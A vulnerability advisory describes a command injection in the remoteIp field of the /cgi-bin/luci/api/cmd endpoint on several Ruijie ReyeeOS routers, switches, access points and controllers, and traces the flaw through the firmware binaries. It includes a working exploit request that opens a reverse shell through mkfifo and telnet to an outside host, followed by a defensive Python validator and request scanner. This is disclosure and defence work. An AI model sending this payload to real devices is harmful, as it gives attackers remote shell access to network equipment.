Vendor of the products: Ruijie Networks
Vendor's website: https://www.ruijienetworks.com/
Reported by: Wang Jincheng (wjcwinmt@outlook.com), He Nan (2777256035@qq.com)
Affected products: RG-EW Series Routers and Repeaters, RG-NBS and RG-S1930 Series Switches, RG-EG Series business VPN Routers, RG-EAP and RG-RAP Series Wireless APs, RG-NBC Series Wireless Controllers
Affected firmware version: EW_3.0(1)B11P219, SWITCH_3.0(1)B11P219, EG_3.0(1)B11P219, AP_3.0(1)B11P219, AC_3.0(1)B11P219
Firmware download address: ReyeeOS219
A command injection vulnerability in RG-EW series routers and repeaters v.EW_3.0(1)B11P219, RG-NBS and RG-S1930 series switches v.SWITCH_3.0(1)B11P219, RG-EG series business VPN routers v.EG_3.0(1)B11P219, RG-EAP and RG-RAP series wireless access points v.AP_3.0(1)B11P219, and RG-NBC series wireless controllers v.AC_3.0(1)B11P219 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /cgi-bin/luci/api/cmd via the remoteIp field.
Analyzing the /usr/lib/lua/luci/modules/cmd.lua file reveals that operation types such as devConfig or devSta and operators such as get or set can be arbitrarily combined into different method fields. For instance, selecting the devConfig.get method triggers the doParams(params) function, where params is the JSON data sent in the POST request. Subsequently, the fetch function is invoked, which ultimately calls the uf_client_call function from /usr/lib/libunifyframe.so. The data is then transmitted over a socket to /usr/sbin/unifyframe-sgi.elf.
In the /usr/lib/libunifyframe.so file, the value of remoteIp is parsed from a1[5], where a1 is the base address of the JSON data object. Because a1 is of type DWORD* (four bytes per element), a1[5] is equivalent to *(a1+20), which holds the remoteIp field.
Within /usr/sbin/unifyframe-sgi.elf there is a command injection vulnerability. The first format specifier %s in the snprintf call corresponds to *(a1+20), i.e. the value of the params.remoteIp field in the POST request. This value is user-controllable, so when the resulting string is passed to the ufm_popen function, arbitrary commands are executed.
Send the following POST request to /cgi-bin/luci/api/cmd.

{
    "method": "devConfig.get",
    "params": {
        "module": "123",
        "remoteIp": "$(mkfifo /tmp/test;telnet 192.168.45.203 6666 0</tmp/test|/bin/sh > /tmp/test)",
        "data": {
            "kkk": "abc"
        }
    }
}
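As an added example that is not part of this advisory or of Ruijie's code, the following Python implements the check a defender would want in front of this flaw: remoteIp is accepted only as a plain IPv4 literal, and captured POST bodies to the cmd endpoint are flagged when the field carries shell syntax. The endpoint and field names come from the advisory; the function names, the metacharacter list and the sample records are constructed for this example.

```python
import ipaddress
import json
import re

CMD_ENDPOINT = "/cgi-bin/luci/api/cmd"   # endpoint named in the advisory
SHELL_META = re.compile(r"[;&|`$(){}<>\"'\n]")  # shell syntax an IPv4 literal never needs

def remote_ip_is_valid(value):
    """Allow-list check: remoteIp must be exactly one IPv4 dotted-quad literal."""
    if not isinstance(value, str) or len(value) > 15:
        return False
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True

def inspect_request(path, raw_body):
    """Return findings for one POST to the cmd API; [] means nothing suspicious."""
    if path != CMD_ENDPOINT:
        return []
    try:
        body = json.loads(raw_body)
    except ValueError:
        return ["body is not valid JSON"]
    params = body.get("params") if isinstance(body, dict) else None
    if not isinstance(params, dict) or "remoteIp" not in params:
        return []
    remote_ip = params["remoteIp"]
    findings = []
    if not remote_ip_is_valid(remote_ip):
        findings.append("remoteIp is not an IPv4 literal")
    if isinstance(remote_ip, str) and SHELL_META.search(remote_ip):
        findings.append("remoteIp contains shell metacharacters")
    return findings

# Constructed sample records (not captured traffic): one benign, one injection-shaped.
SAMPLE_REQUESTS = [
    {"path": CMD_ENDPOINT, "body": '{"method": "devConfig.get", "params": '
     '{"module": "123", "remoteIp": "192.168.1.10", "data": {"kkk": "abc"}}}'},
    {"path": CMD_ENDPOINT, "body": '{"method": "devConfig.get", "params": '
     '{"module": "123", "remoteIp": "$(echo injected)", "data": {"kkk": "abc"}}}'},
]

def scan(records):
    """Map record index -> findings for every record that has any."""
    results = ((i, inspect_request(r["path"], r["body"])) for i, r in enumerate(records))
    return {i: f for i, f in results if f}
```

The same remote_ip_is_valid check, applied in the Lua layer before params reach uf_client_call, would reject the payload shown above outright.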